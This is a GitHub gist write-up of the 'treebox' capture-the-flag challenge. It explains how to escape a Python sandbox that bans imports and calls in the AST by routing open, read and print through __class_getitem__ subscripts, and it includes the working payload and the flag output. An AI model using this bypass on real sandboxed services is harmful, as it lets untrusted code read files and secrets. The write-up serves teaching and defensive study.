Skip to content

Instantly share code, notes, and snippets.

@taswhe
Created August 4, 2022 14:31
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save taswhe/c25f5c079a1e726f69cd3882c33838da to your computer and use it in GitHub Desktop.
Save taswhe/c25f5c079a1e726f69cd3882c33838da to your computer and use it in GitHub Desktop.

TreeBox: Escaping a Python AST Sandbox

Python is a versatile and easy-to-learn programming language. As such, developers are keen to use it as a "mini-programming language" for users to write custom code that will run within an application's sandbox. The usual idea is to do the following:

  1. read the user's custom code;
  2. verify that the code is safe to execute (i.e. sandbox it)
  3. exec() the verifed safe code.

Clearly, the challenge here is to "verify that the code is safe to execute". How do we do that in practice? An often suggested way is to parse the code into an Abstract Syntax Tree (AST). We can then inspect the AST to ban what we do not desire (blacklisting) and/or to allow only what we want (whitelisting).

Creating an AST is easily accomplished with the ast module. However, deciding what to blacklist in a sandbox is notoriously difficult. This is clearly demonstrated in the treebox challenge.

The treebox Challenge

In treebox, we are given the following Python script.

#!/usr/bin/python3 -u
#
# Flag is in a file called "flag" in cwd.
#
# Quote from Dockerfile:
#   FROM ubuntu:22.04
#   RUN apt-get update && apt-get install -y python3
#
import ast
import sys
import os

def verify_secure(m):
  for x in ast.walk(m):
    match type(x):
      case (ast.Import|ast.ImportFrom|ast.Call):
        print(f"ERROR: Banned statement {x}")
        return False
  return True

abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)

print("-- Please enter code (last line must contain only --END)")
source_code = ""
while True:
  line = sys.stdin.readline()
  if line.startswith("--END"):
    break
  source_code += line

tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
if verify_secure(tree):  # Safe to execute!
  print("-- Executing safe code:")
  compiled = compile(source_code, "input.py", 'exec')
  exec(compiled)

The code's logic is straightforward: it reads in lines of user input, compiles them into an AST, and then calls verify_secure() to check that the AST does not use import, from ... import ... and that it does not make any function calls.

That is indeed a very restrictive blacklist. Without imports and function calls, surely the user can do no harm... right?

Bypassing verify_secure()

The code says that the Flag is in a file called "flag" in cwd. If not for verify_secure(), the following "attack code" would trivially allow us to capture the flag:

fd = open("flag")
flag = fd.read()
print(flag)

Alas, the reality is that verify_secure() is invoked and that it will ban all 3 ast.Calls.

But what if we can modify our code into a form that calls the 3 functions (open, read and print) in a way that does not use ast.Call in its AST? If we can do that, then we would be able to bypass verify_secure().

Indexing as function calls

In terms of syntax and semantics, an indexing operation a[x] looks a lot like a function call f(x). In both cases, we pass in an input and we get its corresponding output.

Indeed, Python internally implements indexing using the special function __getitem__(). If we have a list a, invoking a[x] results in a.__getitem__(x) being called. However, and this is the critical observation, the resulting AST does NOT contain any ast.Call as indexing is mapped to ast.Subscript. Take a look:

>>> print(ast.dump(compile("a[0]", "", "exec", flags=ast.PyCF_ONLY_AST),indent=4))
Module(
    body=[
        Expr(
            value=Subscript(
                value=Name(id='a', ctx=Load()),
                slice=Constant(value=0),
                ctx=Load()))],
    type_ignores=[])

This means that if we replace __getitem__() with print, we can invoke a[x] to do print(x). Furthermore, the resulting AST does not contain ast.Call!

Built-in types are immutable

Does that mean we can now just replace list.__getitem__ with the appropriate functions and solve the challenge?

Not so fast! Built-in types like list are immutable and so their attributes can't be changed programmatically:

>>> list.__getitem__ = print
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: cannot set '__getitem__' attribute of immutable type 'list'

If we can't use built-in types, how about creating our own?

>>> class A: pass
>>> A.__getitem__ = print
>>> a = A()
>>> a["hello world"]
hello world

That works! But here's the catch: a = A() generates an ast.Call and so the code above would not get around verify_secure().

Capturing the flag

All is not lost though. It turns out that since Python 3.7, classes have __class_getitem__ methods to allow run-time parameterization of generic classes.

Using this feature, we can now easily accomplish what we want:

$ nc treebox.2022.ctfcompetition.com 1337
== proof-of-work: disabled ==
-- Please enter code (last line must contain only --END)
class A: pass
A.__class_getitem__ = open
fd = A["flag"]
A.__class_getitem__ = fd.read
flag = A[-1]
A.__class_getitem__ = print
A[flag]
--END
-- Executing safe code:
CTF{CzeresniaTopolaForsycja}

By successively replacing A.__class_getitem__ with the functions of our choice, we are able to call them using a subscripting syntax instead of the usual function call syntax.

Conclusion

An AST only captures the syntax of the Python code - but it isn't be aware that Python internally implements subscripting as function calls to __getitem__() or __class_getitem__(). That knowledge is what allow us to escape the sandbox.

Of course, now that we are aware, we could attempt to add ast.Subscript to the blacklist. But a sandboxed environment that prohibits subscripting is pretty much useless as we can't use list and dict.

Also, an AST is not aware that exec() exposes the import modules to the code it executes. So even if we disallow ast.Import and ast.ImportFrom, the sandboxed code actually still has access to ast, sys and os because they were imported before exec() is called. (Our exploit is simple enough that we did not have to use this "feature".)

In summary, implementing a Python sandbox using an AST with a blacklist is really not such a great idea.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment